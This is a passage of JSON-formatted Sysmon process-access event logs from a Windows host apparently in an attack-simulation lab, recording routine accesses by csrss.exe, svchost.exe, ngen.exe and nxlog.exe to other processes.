C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:44.185","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-137A-5F25-0000-00108A5E0F00}","TargetProcessId":"3816","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:44","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8696,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:44.201\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1394-5F25-0000-00107C371000}\r\nTargetProcessId: 3816\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:44.201","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1394-5F25-0000-00107C371000}","TargetProcessId":"3816","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:44","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8697,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:44.263\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1394-5F25-0000-00107E3C1000}\r\nTargetProcessId: 2624\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:44.263","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1394-5F25-0000-00107E3C1000}","TargetProcessId":"2624","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:44","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8698,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:44.263\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1394-5F25-0000-00107E3C1000}\r\nTargetProcessId: 2624\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:44.263","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1394-5F25-0000-00107E3C1000}","TargetProcessId":"2624","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:44","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8699,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:44.279\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1394-5F25-0000-00107E3C1000}\r\nTargetProcessId: 2624\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:44.279","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1394-5F25-0000-00107E3C1000}","TargetProcessId":"2624","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:44","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8700,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:44.373\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-137A-5F25-0000-001049650F00}\r\nTargetProcessId: 4616\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:44.373","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-137A-5F25-0000-001049650F00}","TargetProcessId":"4616","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:44","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8701,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:44.373\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-137A-5F25-0000-001049650F00}\r\nTargetProcessId: 4616\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:44.373","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-137A-5F25-0000-001049650F00}","TargetProcessId":"4616","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:44","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8702,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:44.373\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-137A-5F25-0000-001049650F00}\r\nTargetProcessId: 4616\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:44.373","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-137A-5F25-0000-001049650F00}","TargetProcessId":"4616","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:44","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8703,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:44.435\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:44.435","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files 